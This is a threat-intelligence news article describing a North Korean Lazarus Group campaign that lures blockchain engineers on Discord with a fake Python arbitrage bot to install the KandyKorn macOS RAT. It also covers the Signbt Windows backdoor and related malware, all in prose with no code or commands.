Table of Contents
New North Korean Hacking Group Attacks
Researchers have discovered a hacking campaign which tracks back to a group reportedly linked to North Korea. This advanced campaign appears to be part of North Korea's efforts to evade international sanctions, with probable targets being cryptocurrency holdings. The overlap of this hacking campaign's tactics and techniques with Lazarus, a renowned North Korean state-sponsored hacker group, has been noted by cybersecurity firm Elastic Security Labs. The exact identity of the victims is yet to be disclosed, however, it is reported that they work for a cryptocurrency exchange.
Use of New macOS and Windows Malware by Lazarus Group
Interestingly, this campaign targets devices running macOS, predominantly blockchain engineers' Apple laptops or desktops. The hackers used an advanced implant referred to as Kandykorn, capable of accessing and extracting data from the victim's computer, uploading and executing additional payloads, and killing processes. This malware continues to avoid detection successfully, adding to its potency and threat. The Lazarus group has also used the SIGNBT and LPEClient malware strains in the past to collect information about the victims' devices and steal their login details.
Targeting Blockchain Engineers at a Cryptocurrency Exchange
The prime targets of this campaign are believed to be blockchain engineers employed by a cryptocurrency exchange. Elastic Security Labs has withheld the bitten exchange's name for precautionary measures. The hackers' inclination towards this particular target suggests a potential objective of stealing cryptocurrency as a means to bypass international sanctions which North Korea is currently facing.
Impersonation of Blockchain Community Members on Public Discord Channel
In an attempt to gain the trust of their targets, the hackers have been impersonating members of the blockchain community on a public Discord server. It was through this platform that the hackers delivered their Python application posing as a cryptocurrency arbitrage bot to unsuspecting victims. This bot is programmed to automatically buy and sell cryptocurrencies to profit from the price differences on different cryptocurrency exchanges.
Use of Python Application for Initial Access and Loading of Binaries in Memory
One aspect that stood out regarding this hacking campaign was the hackers' method for gaining access to the target systems. By creating a Python app posing as a cryptocurrency arbitrage bot, they were able to deceive their victims into loading malicious payloads into their system's memory. This method is considered to be atypical for macOS intrusions, illustrating the hackers' sophistication and inventiveness.
Introduction and Operation of KandyKorn macOS Malware
KandyKorn, a remote access trojan (RAT) developed by the Lazarus Group linked to North Korea, presents a novel and potent threat in the world of cybersecurity. This malware stands out due to its ability to establish encrypted command-and-control (C communications, enumerate systems, upload and execute additional malicious payloads, and exfiltrate data, all while compressing it to remain under the radar. Tying back to as early as April 2023, the KandyKorn RAT continues to be an active threat with ongoing development of its tools and techniques, as revealed by Elastic Security Labs researchers.
Execution of KandyKorn Malware on Target Machine
The KandyKorn malware is distributed through a Python application posing as an arbitrage bot. Once the bot is installed on the target machine, it retrieves Python files that execute the SUGARLOADER second-stage payload. SUGARLOADER subsequently fetches and executes KandyKorn. This sequential execution process reduces the number of potential endpoint and network artifacts, limiting potential discovery and making KandyKorn a highly sophisticated RAT.
Malware Capabilities: Monitor, Interact, and Avoid Detection
KANDYKORN excels as an advanced implant due to its extensive capabilities, including monitoring, interacting with the system, and evading detection. It extends its functionality by allowing for the execution of additional malware, terminating processes, and executing arbitrary commands. These abilities, coupled with file enumeration and data exfiltration, make KANDYKORN a formidable tool in the hands of those with malevolent intent.
Reflective Loading Used for Direct-Memory Form of Execution
The malware employs reflective loading, an advanced technique used for a direct-memory form of execution. This method may bypass detection tools by keeping its payloads in memory, rather than writing them to disk. Reflective loading enables KandyKorn to remain undetected while it carries out its destructive activities within the system.
Command-and-Control Server Commands to Malware for Information Harvesting and System Control
After establishing communication, KandyKorn awaits commands from the command-and-control servers instead of polling for them. This approach reduces the generation of endpoint and network artifacts, further evading system and network monitoring tools. As per the commands received, the malware can perform various activities such as system enumeration, data exfiltration, and command execution, as needed by the attackers. This responsiveness to the command-and-control server enhances KandyKorn's threat potential significantly.
Additional Attacks and Malware Deployments
North Korean hackers are not only restricted to using KandyKorn macOS malware for their malicious activities. There have been other instances where they have launched sophisticated attacks targeting a variety of platforms and exploiting various software and systems vulnerabilities.
Attacks on Users of a Security Software for Encrypted Web Communications
In addition to using advanced forms of macOS malware, threat actors from North Korea have been known to target users of security software designed for encrypted web communication. Hackers are increasingly turning to a wide range of methods to deliver their malicious payloads, exploiting the trust users place in secure communication channels to slip by unnoticed and gain access to sensitive information or systems.
Compromise of Software Vendor’s System Through Exploitation of Unpatched Vulnerabilities
Cybercriminals, including those tied to the rogue state of North Korea, often exploit unpatched vulnerabilities in software vendors' systems to infiltrate and compromise their targets. Using this method, they are able to gain unauthorized access to otherwise secure systems, install malicious software, and steal valuable data. Companies are urged to implement robust cybersecurity measures and ensure their systems are up to date with the latest security patches to prevent such attacks.
Deployment of New Windows Backdoor Malware Called Signbt
Another significant threat from North Korean hackers is the deployment of a new Windows backdoor malware known as Signbt. This type of malware enables hackers to take control of an infected system, giving them the ability to execute commands remotely, install additional malware, or steal sensitive information. Like KandyKorn, Signbt demonstrates the increasing sophistication and advanced capabilities of malware used by North Korean hackers in their ongoing cyber-espionage campaigns.
Detailed Functioning of Signbt Malware
Signbt malware is a powerful backdoor tool developed by North Korean hackers, allowing them to operate covertly while performing a broad range of malicious actions. This Windows backdoor tool exhibits significant functionality, from fingerprinting the system to maintaining full control over the victim's machine, as well as deploying additional payloads.
Fingerprinting of the System and Communication with C&C Server
The Signbt malware starts its operation by fingerprinting the infected machine, collecting all essential information about the system. This fingerprinting process includes gathering data about the operating system, hardware configurations, installed software, and network details. After the collection, this information is encrypted and sent to the command-and-control (C&C) server established by the hackers, establishing a communication link between the compromised machine and the hackers.
Server Command Execution Capability
After establishing a communication link with the C&C server, the Signbt malware waits for subsequent commands. This server command execution capability enables the hackers to control the infected machine remotely and perform a wide range of malicious activities, including uploading, downloading, and executing files, carrying out system enumeration processes, and more.
Full Control Over Victim Machine and Information Theft
The Signbt malware provides complete control over the victim's machine to the hackers, making it a highly potent tool in the hands of the North Korean hacking group Lazarus. Beyond the execution of arbitrary commands, the malware can steal sensitive data from the infected machine, leading to severe breaches of privacy and substantial potential financial loss.
Deployment of Additional Payloads in-Memory, Including LPEClient Malware and Credential Dumping Utilities
Adding to its capabilities, the Signbt malware can deploy additional payloads in-memory, a technique that allows it to evade many security measures. One such payload that has been linked to Signbt is the LPEClient malware. Additionally, the hackers also employ credential dumping utilities to steal the login details from the victim's machine, further amplifying the potential harm of an attack.